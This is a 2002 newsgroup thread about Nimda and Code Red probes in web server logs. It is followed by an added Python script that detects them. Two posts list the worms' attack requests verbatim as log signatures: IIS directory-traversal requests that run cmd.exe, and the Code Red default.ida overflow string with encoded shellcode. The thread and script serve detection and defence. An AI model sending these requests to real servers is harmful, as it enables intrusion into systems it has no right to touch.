cmd.exe and root.exe in HTTP error files

Post by Newse Surphe » Tue, 09 Apr 2002 21:52:55



Hi,

I seem to have quite a few errors in my http log files for certain IPs
looking for 'root.exe' and 'cmd.exe' in rather odd non-existent directories
on my server.

Any ideas as to what this might be?


cmd.exe and root.exe in HTTP error files

Post by Eirik Se » Tue, 09 Apr 2002 22:08:20



>  Hi,

>  I seem to have quite a few errors in my http log files for certain IPs
>  looking for 'root.exe' and 'cmd.exe' in rather odd non-existent directories
>  on my server.

>  Any ideas as to what this might be?

Nimda.

http://www.cert.org/advisories/CA-2001-26.html

- Eirik
--
New and exciting signature!


cmd.exe and root.exe in HTTP error files

Post by Patrick HERV » Wed, 10 Apr 2002 01:02:25


Nimda or Code Red


> Hi,

> I seem to have quite a few errors in my http log files for certain IPs
> looking for 'root.exe' and 'cmd.exe' in rather odd non-existent directories
> on my server.

> Any ideas as to what this might be?


cmd.exe and root.exe in HTTP error files

Post by p.. » Wed, 10 Apr 2002 05:03:19



> Hi,
> I seem to have quite a few errors in my http log files for certain IPs
> looking for 'root.exe' and 'cmd.exe' in rather odd non-existent directories
> on my server.
> Any ideas as to what this might be?

Nimda (a worm that attacks IIS servers; others are not vulnerable)

--
Peter Håkanson
        IPSec  Sverige      (At the Riverside of Gothenburg, home of Volvo)
           Sorry about my e-mail address, but i'm trying to keep spam out.
           Remove "icke-reklam" and it works.


cmd.exe and root.exe in HTTP error files

Post by Don Kellowa » Wed, 10 Apr 2002 13:53:31


For reference:

NIMDA WORM
When you see the following in a log file, it's indicative of various IPs
attempting to compromise the webserver with the NIMDA worm.
Visit http://www.cert.org/advisories/CA-2001-26.html for further
information...

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

CODE RED WORM
When you see the following in a log file, it's indicative of various IPs
attempting to compromise the webserver with the CODE RED worm.
Visit http://www.cert.org/advisories/CA-2001-19.html for further
information...

/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a

CODE RED II WORM
When you see the following attempts in a log file, it's indicative of
various IPs attempting to compromise the webserver with the CODE RED II
worm.
Visit http://www.cert.org/incident_notes/IN-2001-09.html for further
information...

/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
0%u531b%u53ff%u0078%u0000%u00=a

--
Best Regards,
Don Kelloway
http://www.commodon.com

For *your* protection, visit http://www.commodon.com/threat to learn about
Back Orifice, NetBus, SubSeven and a few others.  All of which are "Threats
to Your Security on the Internet".


> Hi,

> I seem to have quite a few errors in my http log files for certain IPs
> looking for 'root.exe' and 'cmd.exe' in rather odd non-existent directories
> on my server.

> Any ideas as to what this might be?


cmd.exe and root.exe in HTTP error files

Post by Don Kellowa » Wed, 10 Apr 2002 14:04:29


NIMDA WORM
When you see the following in a log file, it's indicative of various IPs
attempting to compromise the webserver with the NIMDA worm.  Visit
http://www.cert.org/advisories/CA-2001-26.html for further information...

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

CODE RED WORM
When you see the following in a log file, it's indicative of various IPs
attempting to compromise the webserver with the CODE RED worm.  Visit
http://www.cert.org/advisories/CA-2001-19.html for further information...

/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a

CODE RED II WORM
When you see the following attempts in a log file, it's indicative of
various IPs attempting to compromise the webserver with the CODE RED II
worm.  Visit http://www.cert.org/incident_notes/IN-2001-09.html for further
information...

/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
0%u531b%u53ff%u0078%u0000%u00=a

--
Best Regards,
Don Kelloway
http://www.commodon.com

For *your* protection, visit http://www.commodon.com/threat to learn about
Back Orifice, NetBus, SubSeven and a few others.  All of which are "Threats
to Your Security on the Internet".


> Hi,

> I seem to have quite a few errors in my http log files for certain IPs
> looking for 'root.exe' and 'cmd.exe' in rather odd non-existent directories
> on my server.

> Any ideas as to what this might be?
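The request lists in Don Kelloway's two posts above are the signatures a log scanner needs. As an added example that is not part of the thread, the script below reads Apache common-format log lines, folds the separator encodings from the Nimda list (%5c, %2f, %35c, %c0%af, \xc1\x1c and so on) back to a plain path so every variant resolves to the same target, and tags each source IP with the worm family its requests match. The log lines are constructed, the 100-character floor for the Code Red filler and the separator folding are assumptions of this example.

```python
import re
from collections import defaultdict

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+')  # Apache common log format

# Separator encodings seen in the Nimda probes quoted in the thread.  Apache logs
# non-printable bytes as \xNN while IIS keeps the %-form, so both spellings are
# listed.  Folding each of them to "/" is an assumption made for this example.
SEPARATORS = ["%5c", "%2f", "%35c", "%c0%af", "%c1%1c", "%c1%9c", "%c0/",
              r"\xc0\xaf", r"\xc1\x1c", r"\xc1\x9c", r"\xc0/", "\\"]

def normalize_path(path):
    """Fold the separator tricks back to '/' and resolve '..' segments."""
    p = path.split("?", 1)[0].lower()
    for sep in SEPARATORS:
        p = p.replace(sep, "/")
    out = []
    for seg in p.split("/"):
        if seg == ".." and out:
            out.pop()
        elif seg and seg != "..":
            out.append(seg)
    return "/" + "/".join(out)

def classify(path):
    """Return 'nimda', 'code-red', 'code-red-ii' or None for one request path."""
    low = path.lower()
    if low.startswith("/default.ida?"):
        filler = low[len("/default.ida?"):].split("%u", 1)[0]   # the N.../X... run
        if len(filler) >= 100:                                   # assumed floor
            return {"n": "code-red", "x": "code-red-ii"}.get("".join(set(filler)))
    elif normalize_path(low).endswith(("/cmd.exe", "/root.exe")) and "?/c+dir" in low:
        return "nimda"
    return None

def scan(lines):
    """Return {ip: {label: count}} for every log line matching a worm signature."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line)
        if m and (label := classify(m.group(2))):
            hits[m.group(1)][label] += 1
    return {ip: dict(counts) for ip, counts in hits.items()}

SAMPLE_LOG = [  # constructed lines; the request paths are the ones quoted in the thread
    '192.0.2.10 - - [09/Apr/2002:13:52:55 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210',
    '192.0.2.10 - - [09/Apr/2002:13:52:56 +0000] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210',
    r'192.0.2.10 - - [09/Apr/2002:13:52:57 +0000] "GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210',
    '198.51.100.7 - - [09/Apr/2002:14:01:03 +0000] "GET /default.ida?' + "N" * 224 + '%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 210',
    '203.0.113.5 - - [09/Apr/2002:14:05:11 +0000] "GET /index.html HTTP/1.1" 200 1532',
]
```

Running `scan(SAMPLE_LOG)` tags 192.0.2.10 with three Nimda probes and 198.51.100.7 with one Code Red request; the 404 status these probes produce on a non-IIS host is exactly the "error file" noise the original poster saw.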